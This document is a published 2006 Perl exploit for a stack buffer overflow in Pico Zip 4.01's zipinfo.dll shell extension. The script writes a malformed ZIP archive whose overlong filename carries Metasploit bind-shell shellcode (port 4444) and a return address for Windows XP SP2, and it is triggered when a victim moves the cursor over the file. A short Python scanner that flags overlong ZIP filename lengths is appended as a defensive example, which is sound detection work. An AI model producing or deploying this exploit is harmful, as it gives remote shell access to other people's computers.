Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit
Source: http://www.securityfocus.com  Author: c0rrupt  Published: 2006-06-16

#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused by a boundary error within the
# "zipinfo.dll" info tip shell extension when reading an ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

use strict;
use warnings;

my $offset = "\x6F\xE2\xD7\x5A"; # Windows XP SP2 English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";

# Filename field: shellcode, "A" padding up to 524 bytes, then the 4-byte $offset.
my $filename = $shellcode . "A" x (524 - length($shellcode)) . $offset;

# Local file header (PK\x03\x04). The trailing \x14\x02 is the little-endian
# filename length 0x0214 = 532: the 528 bytes of $filename plus ".txt" from $middle.
my $head = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

# ".txt" suffix of the first name, followed by the central directory header
# (PK\x01\x02) for the same entry, again declaring a 0x0214-byte name.
my $middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
"\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

# ".txt" suffix of the second name, followed by the end-of-central-directory
# record (PK\x05\x06): one entry, central directory size 0x242 at offset 0x232.
my $tail = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
"\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
"\x32\x02\x00\x00\x00\x00";

my $evilzip = $head . $filename . $middle . $filename . $tail;

open(my $zipfh, '>', 'exploit.zip') || die "cannot open output file: $!";
binmode($zipfh); # raw bytes, no newline translation on Windows
print {$zipfh} $evilzip or die "cannot write to output file: $!";
close($zipfh) or die "cannot close output file: $!";
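The weakness above is that the shell extension trusts the filename length fields in the ZIP headers (the script sets both to 0x0214, 532 bytes). As an added defensive example, not part of the original post or of Pico Zip, the Python scanner below walks an archive's local and central headers by signature instead of trusting declared sizes and flags any member whose declared name length exceeds a limit; the 260-byte threshold (Windows MAX_PATH) is an assumption, and the sample archives are constructed with the standard zipfile module.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header: name length at offset 26
CENTRAL_SIG = b"PK\x01\x02"  # central directory header: name length at offset 28

# Assumed threshold (not from the page): Windows MAX_PATH. The archive produced by
# the script above declares 0x0214 = 532-byte names, well past any legitimate path.
MAX_SANE_NAME_LEN = 260


def scan_zip_filenames(data: bytes):
    """Walk headers by signature (not by trusting sizes) and return a list of
    (kind, header_offset, declared_name_length) for every entry found."""
    findings = []
    pos = 0
    while (pos := data.find(b"PK", pos)) >= 0:
        sig = data[pos:pos + 4]
        if sig == LOCAL_SIG and pos + 30 <= len(data):
            name_len, extra_len = struct.unpack_from("<HH", data, pos + 26)
            findings.append(("local", pos, name_len))
            pos += 30 + name_len + extra_len
        elif sig == CENTRAL_SIG and pos + 46 <= len(data):
            name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
            findings.append(("central", pos, name_len))
            pos += 46 + name_len + extra_len + comment_len
        else:
            pos += 1  # not a header we care about; keep searching
    return findings


def suspicious_entries(data: bytes, limit: int = MAX_SANE_NAME_LEN):
    """Entries whose declared filename length exceeds the limit."""
    return [f for f in scan_zip_filenames(data) if f[2] > limit]


def build_sample_zip(name: str) -> bytes:
    """Constructed test input: a one-member STORED archive with the given name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, b"")
    return buf.getvalue()


if __name__ == "__main__":
    for label, name in (("benign", "readme.txt"), ("overlong", "A" * 600)):
        print(label, suspicious_entries(build_sample_zip(name)))
```

Because the scan is signature-driven, it still reports entries when the declared sizes are inconsistent, which is exactly the case a crafted archive presents.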
